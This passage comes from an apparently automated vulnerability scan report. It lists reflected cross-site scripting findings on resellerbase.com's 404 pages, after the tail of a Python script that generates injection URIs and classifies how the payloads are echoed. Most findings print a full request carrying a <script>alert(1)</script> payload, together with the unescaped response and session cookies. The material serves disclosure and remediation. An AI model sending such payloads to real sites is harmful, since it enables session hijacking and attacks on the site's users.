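    """Add a parameter whose *name* is the payload (findings 2.1972, 2.1979)."""
    separator = "&" if "?" in request_uri else "?"
    return f"{request_uri}{separator}{payload}=1"


def classify_reflection(body, prefix, tag, suffix):
    """Classify how prefix+tag+suffix came back in the response body:
    'unmodified' - tag verbatim between the markers (a <script> would execute)
    'encoded'    - < and > returned as entities (safe in a text node)
    'modified'   - markers present but the tag was altered or removed
    'absent'     - markers not found at all (no reflection in this response)"""
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if match is None:
        return "absent"
    between = match.group(1)
    if between == tag:
        return "unmodified"
    if between == html.escape(tag, quote=False):
        return "encoded"
    return "modified"


def scan_404_sink(escape_output):
    """Replay the report's injection styles against the 404 sink and return
    {probe label: classification}. Base request is the one from finding 2.1977."""
    base = "/detail/28/search.php?keyword=search...&Submit3=Search&opt=2"
    probes = [
        ("REST URL parameter 1", SCRIPT_TAG,
         inject_rest_parameter(base, 1, PREFIX + SCRIPT_TAG + SUFFIX)),
        ("REST URL parameter 3", SCRIPT_TAG,
         inject_rest_parameter(base, 3, PREFIX + SCRIPT_TAG + SUFFIX)),
        ("Submit3 value, <a> probe", ANCHOR_TAG,
         inject_query_value(base, "Submit3", PREFIX + ANCHOR_TAG + SUFFIX)),
        ("Submit3 value, <script>", SCRIPT_TAG,
         inject_query_value(base, "Submit3", PREFIX + SCRIPT_TAG + SUFFIX)),
        ("arbitrary parameter name", SCRIPT_TAG,
         inject_parameter_name(base, PREFIX + SCRIPT_TAG + SUFFIX)),
    ]
    return {label: classify_reflection(render_404(uri, escape_output), PREFIX, tag, SUFFIX)
            for label, tag, uri in probes}


if __name__ == "__main__":
    for mode, flag in (("as reported", False), ("after encoding fix", True)):
        print(mode)
        for label, verdict in scan_404_sink(flag).items():
            print(f"  {label:28s} {verdict}")
```

Against the unencoded document every probe, including the Submit3 <a> probe used for the Firm findings and a <script> probe in the same position, classifies as unmodified; after the encoding fix every probe classifies as encoded. In a live test the generated URIs are sent to the host and the response body is handed to classify_reflection; before rating exploitability, also check how the target browser treats < and > in a URL it is asked to load, since the payload has to reach the server unencoded for the 404 document to echo it verbatim.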

2.1978. http://www.resellerbase.com/detail/28/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2c1e9<a>e7f0f86017b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/28/search.php?keyword=search...2c1e9<a>e7f0f86017b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...2c1e9<a>e7f0f86017b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1979. http://www.resellerbase.com/detail/28/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7bd2c<script>alert(1)</script>c7582e2fde7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=2&7bd2c<script>alert(1)</script>c7582e2fde7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search&opt=2&7bd2c<script>alert(1)</script>c7582e2fde7=1 was not found on this server.</p>
...[SNIP]...

2.1980. http://www.resellerbase.com/detail/28/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/28/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9fa63<a>8f1273b0566 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/28/search.php?keyword=search...&Submit3=Search&opt=29fa63<a>8f1273b0566 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/28/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/search.php?keyword=search...&Submit3=Search&opt=29fa63<a>8f1273b0566 was not found on this server.</p>
...[SNIP]...

2.1981. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7361<script>alert(1)</script>8b8b70c7bd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila7361<script>alert(1)</script>8b8b70c7bd5/28/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila7361<script>alert(1)</script>8b8b70c7bd5/28/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1982. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dd38<script>alert(1)</script>4bc3fcd766b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/281dd38<script>alert(1)</script>4bc3fcd766b/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/281dd38<script>alert(1)</script>4bc3fcd766b/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1983. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44624<script>alert(1)</script>5c0c958b049 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes44624<script>alert(1)</script>5c0c958b049/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes44624<script>alert(1)</script>5c0c958b049/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1984. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 13241<script>alert(1)</script>1e0193c870b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos13241<script>alert(1)</script>1e0193c870b/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos13241<script>alert(1)</script>1e0193c870b/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1985. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 60d03<script>alert(1)</script>7be0bdbd5ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images60d03<script>alert(1)</script>7be0bdbd5ac/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images60d03<script>alert(1)</script>7be0bdbd5ac/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1986. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 99a7b<script>alert(1)</script>e09fa916933 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating99a7b<script>alert(1)</script>e09fa916933/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating99a7b<script>alert(1)</script>e09fa916933/0.gif was not found on this server.</p>
...[SNIP]...

2.1987. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cc638<script>alert(1)</script>fedc97d3b4f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating/0.gifcc638<script>alert(1)</script>fedc97d3b4f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating/0.gifcc638<script>alert(1)</script>fedc97d3b4f was not found on this server.</p>
...[SNIP]...

2.1988. http://www.resellerbase.com/detail/28/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/28/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc043<script>alert(1)</script>c85c125a91a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/28/themes/kosmos/images/rating/0.gif?fc043<script>alert(1)</script>c85c125a91a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/28/themes/kosmos/images/rating/0.gif?fc043<script>alert(1)</script>c85c125a91a=1 was not found on this server.</p>
...[SNIP]...

2.1989. http://www.resellerbase.com/detail/29/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20017<script>alert(1)</script>b9dead9f974 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail20017<script>alert(1)</script>b9dead9f974/29/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail20017<script>alert(1)</script>b9dead9f974/29/ was not found on this server.</p>
...[SNIP]...

2.1990. http://www.resellerbase.com/detail/29/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 949e5<script>alert(1)</script>e1fb464725b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29949e5<script>alert(1)</script>e1fb464725b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29949e5<script>alert(1)</script>e1fb464725b/ was not found on this server.</p>
...[SNIP]...

2.1991. http://www.resellerbase.com/detail/29/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 494bf<script>alert(1)</script>5d919682e07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/?494bf<script>alert(1)</script>5d919682e07=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/?494bf<script>alert(1)</script>5d919682e07=1 was not found on this server.</p>
...[SNIP]...

2.1992. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2d<script>alert(1)</script>702a4ea7f20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila3b2d<script>alert(1)</script>702a4ea7f20/29/mediaplazza-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila3b2d<script>alert(1)</script>702a4ea7f20/29/mediaplazza-com.html was not found on this server.</p>
...[SNIP]...

2.1993. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 159e3<a>31c3c71cc55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29159e3<a>31c3c71cc55/mediaplazza-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29159e3<a>31c3c71cc55/mediaplazza-com.html was not found on this server.</p>
...[SNIP]...

2.1994. http://www.resellerbase.com/detail/29/mediaplazza-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/mediaplazza-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2657b<script>alert(1)</script>43ab51f2c45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/2657b<script>alert(1)</script>43ab51f2c45 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/2657b<script>alert(1)</script>43ab51f2c45 was not found on this server.</p>
...[SNIP]...

2.1995. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload db81c<script>alert(1)</script>bf3b8c2fd81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildb81c<script>alert(1)</script>bf3b8c2fd81/29/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:28:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildb81c<script>alert(1)</script>bf3b8c2fd81/29/rating.php was not found on this server.</p>
...[SNIP]...

2.1996. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/rating.php

Issue detail

